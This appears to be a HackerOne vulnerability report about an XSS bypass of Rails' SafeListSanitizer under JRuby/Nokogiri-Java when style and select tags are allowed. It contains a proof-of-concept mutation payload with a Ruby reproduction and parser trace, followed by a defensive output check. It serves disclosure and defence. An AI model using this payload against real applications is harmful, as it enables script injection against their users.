HackerOne report H1:1530898 (windshock)
History: Apr 05, 2022 - 7:34 a.m.

Ruby on Rails: Rails::Html::SafeListSanitizer vulnerable to XSS attack in an environment that allows the style tag

2022-04-05 07:34:03
windshock
hackerone.com

Tags: ruby on rails, html, safelistsanitizer, nokogiri, java, xss, vulnerability, bugbounty

EPSS: 0.001 (percentile 47.4%)

It seems to be a problem caused by a difference between the Nokogiri Java implementation and the Ruby implementation.
It seems to be an ambiguous case as to whether this should be fixed in Nokogiri or defended against in rails-html-sanitizer.

JRuby 9.3.3.0 (Nokogiri Java), using Rails::Html::SafeListSanitizer.new.sanitize with the select/style tags allowed
code

require "rails-html-sanitizer"   # the original snippet assumes the gem is already loaded

# The tag list passed to sanitize: select and style are allowed through.
tags = %w(select style)
payload = "<select<style/>W<xmp<script>alert(1)</script>"
puts "------------------------------------------------------------------"
puts "use Rails::Html::SafeListSanitizer.new.sanitize, allow select/style tag"
puts "input: " + payload
puts "output: " + Rails::Html::SafeListSanitizer.new.sanitize(payload, tags: tags).to_s
puts "------------------------------------------------------------------"

result

input: <select<style/>W<xmp<script>alert(1)</script>
scrub --> node type :Nokogiri::XML::Text, node name :text, node to_s :W
scrub --> node type :Nokogiri::XML::Text, node name :text, node to_s :<script>alert(1)</script>
scrub --> node type :Nokogiri::XML::Element, node name :xmp, node to_s :<xmp><script>alert(1)</script></xmp>
scrub --> node type :Nokogiri::XML::Element, node name :style, node to_s :<style>W<script>alert(1)</script></style>
scrub --> node type :Nokogiri::XML::Element, node name :select, node to_s :<select><style>W<script>alert(1)</script></style></select>
output: <select><style>W<script>alert(1)</script></style></select>
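The trace above shows why the output is dangerous even though no script element survived scrubbing: the Java parser attached `W<script>alert(1)</script>` to the `<style>` element as raw text, and the serializer wrote that text out verbatim. A browser re-parsing the result does not keep `<style>` in raw-text mode inside `<select>` (the HTML "in select" insertion mode ignores a style start tag but hands a script start tag to the in-head rules), so the text is re-tokenised and the script runs. The following is an added, stdlib-only Ruby example, not code from the report or from rails-html-sanitizer: a defence-in-depth check that inspects sanitizer output for raw-text elements whose content contains tag-like sequences, and a policy that drops such elements. The sample strings, the element list and the helper names (`markup_in_raw_text`, `mutation_risk?`, `drop_markup_bearing_raw_text`) are this example's own assumptions; the regex scan is a heuristic over serialized output, not an HTML parser.

```ruby
# Added example (not from the report): post-sanitization check for raw-text
# elements that carry markup in their content. Runs on plain Ruby, no gems.

# Elements whose children an HTML serializer writes out verbatim, because the
# tokenizer switches to raw text once it has seen the start tag. Assumed list
# for this example; extend it to match the tags your safe list permits.
RAW_TEXT_ELEMENTS = %w[style xmp textarea title iframe noembed noframes].freeze

# Anything that a browser would tokenize as a tag, end tag, comment or bogus comment.
MARKUP_START = %r{<[a-zA-Z/!?]}

def raw_text_element_re(name)
  # start tag (with optional attributes), non-greedy content, matching end tag
  %r{<#{name}(?:\s[^>]*)?>(.*?)</#{name}\s*>}im
end

# Returns [[element_name, content], ...] for every raw-text element whose
# serialized content contains a tag-like sequence.
def markup_in_raw_text(html)
  RAW_TEXT_ELEMENTS.flat_map do |name|
    html.scan(raw_text_element_re(name))
        .map(&:first)
        .select { |content| content.match?(MARKUP_START) }
        .map { |content| [name, content] }
  end
end

def mutation_risk?(html)
  !markup_in_raw_text(html).empty?
end

# Policy: drop any raw-text element whose content contains markup, because the
# surrounding context (e.g. <select>) may stop the browser treating it as raw
# text. Everything else is left untouched.
def drop_markup_bearing_raw_text(html)
  RAW_TEXT_ELEMENTS.inject(html) do |out, name|
    out.gsub(raw_text_element_re(name)) do |whole|
      Regexp.last_match(1).match?(MARKUP_START) ? "" : whole
    end
  end
end

# Constructed samples: the first is the JRuby/Nokogiri-Java output quoted in the
# report, the second is what a legitimate allowed <style> would look like.
JRUBY_OUTPUT  = "<select><style>W<script>alert(1)</script></style></select>"
BENIGN_OUTPUT = "<select><style>option { color: red }</style></select>"

if __FILE__ == $0
  [JRUBY_OUTPUT, BENIGN_OUTPUT].each do |html|
    puts "#{html.inspect}"
    puts "  risk=#{mutation_risk?(html)} findings=#{markup_in_raw_text(html).inspect}"
    puts "  after policy: #{drop_markup_bearing_raw_text(html).inspect}"
  end
end
```

Running it on the report's output flags the `style` element (content `W<script>alert(1)</script>`) and reduces the fragment to `<select></select>`, while the benign stylesheet passes through unchanged. This is a guard for the output side only; the underlying disagreement between the two Nokogiri parsers still needs fixing, and the simplest mitigation remains not adding `style` to the safe list at all.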

Impact

It is possible to bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack.